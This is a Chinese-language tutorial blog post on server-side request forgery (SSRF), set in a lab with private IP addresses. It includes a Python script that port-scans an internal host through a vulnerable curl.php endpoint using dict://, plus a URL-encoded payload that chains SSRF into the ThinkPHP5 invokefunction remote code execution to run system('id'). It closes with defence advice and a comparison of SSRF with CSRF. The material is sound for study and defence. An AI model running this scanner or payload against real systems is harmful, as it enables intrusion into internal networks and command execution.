SSRF服务器请求伪造

最新推荐文章于 2023-01-11 10:20:36 发布
最新推荐文章于 2023-01-11 10:20:36 发布
阅读量263 收藏
点赞数
分类专栏: Web Application漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41182861/article/details/108303666
版权

SSRF概述

  • 服务器请求伪造
    1、网站提供了其他服务器获取数据的请求
    2、没有对目标地址做过滤
    3、靶场:https://github.com/nikosdano/SSRF-Vulnerable-with-Curl

  • SSRF漏洞点
    1、所有传递URL参数的位置都可能存在SSRF漏洞
    2、远程加载图片、视频、通过分享链接等

漏洞利用

  • 设定:
    SSRF漏洞的服务器A为:192.168.83.144
    被攻击服务器B为:192.168.83.139

  • 获取目标服务器的真实IP

  • 读取目标服务器上的文件
    file协议(file://)

内网端口扫描
  • dict协议(dict://)
  • 通过访问http://192.168.83.144/SSRF/curl.php?path=dict://192.168.83.139:3306来探测服务器B的3306端口开放情况。

在这里插入图片描述

  • 发送请求后,迅速返回响应包。根据响应包内容,说明服务器B的3306端口时开启状态。
  • 如果,发送请求后,响应包有迟钝,响应包中无内容。说明端口未开启:
    在这里插入图片描述
  • 端口扫描脚本:
import requests
def port_scan(port):
    for i in range(1,port):
        try:
            req = requests.get('http://192.168.83.144/SSRF/curl.php?path=dict://192.168.83.139:{}'.format(i),timeout=3)
            if req.elapsed.total_seconds() < 1:	
                print(i,'is open!')
        except:
            pass
def main():
    port_scan(100)  #先扫描前100个端口
if __name__ == '__main__':
    main()

攻击内网的应用

  • http协议攻击thinkphp,ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
  • 通过有SSRF漏洞的服务器A192.168.83.144)攻击内网安装有ThinkPHP应用的服务器C
    • PS: ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
      在这里插入图片描述
Payload:
http://192.168.83.144/SSRF/curl.php?path=http%3A%2F%2F192.168.83.129%3A8080%2Findex.php%3Fs%3D%2FIndex%2F%5Cthink%5Capp%2Finvokefunction%26function%3Dcall_user_func_array%26vars%5B0%5D%3Dsystem%26vars%5B1%5D%5B%5D%3Did
  • 利用关键的是支持哪些协议
    • PHP中存在curl扩展,支持的协议较多
    • Java中没有php的curl,主要使用http、file协议进行攻击

SSRF 防御

  • 过滤URL地址:设置URL白名单或禁止访问内网IP。
  • 过滤请求协议:禁用不必要的协议,仅允许httphttps请求。
  • 过滤返回信息:避免根据返回信息来判断服务器的状态。

SSRF与CSRF的对比

  • SSRF
    • 攻击者以目标服务器(有SSRF漏洞)为跳板,进一步攻击外网无法访问的内网服务器。
  • CSRF
    • 攻击者冒用用户的Cookie信息,伪造用户的身份发起请求。
info-sec
关注
专栏目录
【0day】复现海康威视综合安防管理平台SSRF服务器请求伪造漏洞
记录并分享学习安全的知识点..
08-12 677
​ HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,康威视综合安防管理平台SSRF服务器请求伪造漏洞。
SSRF漏洞(服务器请求伪造
赤赤三的博客
03-21 2217
中间人(SSRF就是中间人)攻击,服务端请求伪造,主要攻击内网,打redis和weblogic特别厉害,目标网站的内部系统(他是从内部系统访问的,所以通过它攻击外部系统无法访问的内部系统,也就是目标网站当成中间人)。 大部分漏漏洞都是参数给变量的时候没有做任何限制导致漏洞。 攻击主要结果: 写webshell(需要知道web路径,有增删改查权限,gopher协议的使用,使用工具生成gopher 攻击ssrfpayload) 反弹shell(获取操作系统命令) 原理: 根本原因: SS.
【burpsuite安全练兵场-服务端9】服务端请求伪造SSRF漏洞-7个实验(全)
01-11 9224
【BP靶场portswigger-服务端9-服务端请求伪造SSRF漏洞】7个实验-万文详细步骤
SSRF服务器请求伪造漏洞之——攻防实战与防范方法
温柔小薛的博客
04-10 1082
攻防实战与防范方法 bWAPP 中的 SSRF 给出了 3 个小实验来说明 SSRF 的利用场景 任务 1:使用远程文件包含进行端口扫描(内网探测) 点击任务 1 中的 Port scan 可以获得一份端口扫描的攻击脚本 仅需要包含脚本,并请求 IP 参数为对应的主机即可,接下来就是利用 bWAPP 中的远程文件包含漏洞,执行端口扫描的脚本 Choose your bug 中选择 Remote ...
SSRF(Server-Side Request Forgery):服务器请求伪造
打代码的小女孩
12-23 1663
0X00 SSRF介绍 SSRF(Server-Side Request Forgery:服务器请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限...
SSRF服务器请求伪造漏洞精讲+实验(一个课程讲透)
m0_60091038的博客
07-10 218
实验所需环境:vmware;kali虚拟机一台;windows server一台;有docker环境的Linux虚拟机 1、CSRF、SSRF搞不清楚? 2、SSRF原理是什么?危害大小?如何利用SSRF获取主机权限?如果使用Python提高挖洞效率? 3、Gopher协议、Dict协议?完全没听过啊,没关系,看完课程后你门清。 4、SSRF渗透Redis数据库,Redis客户端和服务器端怎么通信?通信报文是怎么样的?看这里就行。 5、SSRF渗透Struts2总是失败?不知道如何编码?不知道如何
ssrf服务器请求伪造
最新发布
07-22
SSRF 是一种安全漏洞,攻击者可以利用它来伪造服务器发出的请求。攻击者可以通过构造恶意请求,使服务器发送请求到内部网络或其他受保护的资源。 为了防止 SSRF 攻击,有几个建议和防护措施可以考虑: 1. 输入验证...
渗透测试之SSRF服务器请求伪造漏洞
weixin_45380284的博客
03-06 636
SSRF服务器请求伪造漏洞 原理: SSRF(Server-Side Request Forgery:服务器请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) SSRF 形成的原因 大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。 原理简析: S
SSRF(服务端请求伪造)漏洞
墨鱼菜鸡
12-12 179
目录 SSRF SSRF漏洞的挖掘 SSRF漏洞利用 SSRF漏洞防御 SSRF SSRF(Server-Side Request Forgery,服务器请求伪造)漏洞,是一种由攻击者构造请求,由服务器端发起请求的安全漏洞,本质上是属于信息泄露漏洞。 SSRF漏洞原理:很多web应用都提供了...
SSRF(Server-Side Request Forgery)服务器请求伪造
sunxingstar的博客
08-24 2820
SSRF形成的原因大都是因为服务器提供了从其他服务器应用数据的功能且没有对目 标地址过过滤与限制,如从指定的URL地址获取网页文本内容,加载图片等. 攻击内网应用,主要针对使用GET请求就可以实现的攻击,如Struts2漏洞、SQL注 入 . 借助其他协议攻击应用,如gopher、file、dict ...
ssrf漏洞修复_[漏洞通告]jackson2642/jacksondatabind && Fastjson SSRF(服务器请求伪造)...
weixin_30325819的博客
12-27 514
漏洞描述近日,亚信安全网络攻防实验室跟踪到jackson-databind新增一个黑名单类,由threedr3am提交.该类来源于JDK,不需要依赖任何jar包,该类主要可用于SSRF(服务器请求伪造).SSRF漏洞的危害,本文不多作赘述.漏洞编号Jackson内部编号2642漏洞威胁等级中危不受影响范围jackson-databind >= 2.9.10.4jackson-da...
SSRF服务端请求伪造漏洞
m0_57379855的博客
03-11 689
SSRF服务端请求伪造漏洞SSRF服务端请求伪造漏洞php-curl扩展curl其他协议php危险函数SSRF利用方式pikachuSSRFSSRF修复防御 SSRF服务端请求伪造漏洞 服务端请求伪造攻击(Server-side Request Forgery) 很多web应用都提供了从其他的服务器上获取数据的功能。 使用用户指定的URL, web应用可以获取图片。下载文件,读取文件内容等。 这个功能如果被恶意使用,可以利用存在缺陷的web应用作 为代理攻击远程和本地的服务器.这种形式的攻击称为服务端请求
SSRF(服务器请求伪造漏洞)
broing55的博客
03-05 605
SSRF(服务器请求伪造漏洞) SSRF-漏洞介绍 SSRF漏洞:SSRF(Server-Side Request Forgery:服务器请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的...
Web安全基础:第4节:服务端请求伪造SSRF漏洞-基础篇
lm19770429的专栏
09-04 210
1. SSRF简介 SSRF(Server-Side Request Forgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。 由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。 ...
SSRF(服务端请求伪造)漏洞
weixin_45253622的博客
03-26 789
SSRF 定义: SSRF (Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,本质是信息泄露漏洞。 数据流:攻击者----->服务器---->目标地址 漏洞原理 SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器
SSRF02】服务器请求伪造——WebLogic架构漏洞复现之从SSRF==>未授权访问==>GetShell
Fighting_hawk的博客
03-16 4461
1. 掌握SSRF漏洞挖掘的方法; 2. 掌握利用SSRF漏洞进行内网扫描; 3. 本实验中未涉及SSRF利用时绕过的方法; 4. 后续将研究如何成功反弹shell。
服务器请求伪造SSRF漏洞)
shy的博客
12-02 990
SSRF漏洞简介 SSRF是由攻击者构造请求服务器发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统。(正因为请求是由服务器发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。 SSRF漏洞原理 大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址进行过滤与限制。 SSRF漏洞源码 <?php function curl($url){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$url
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值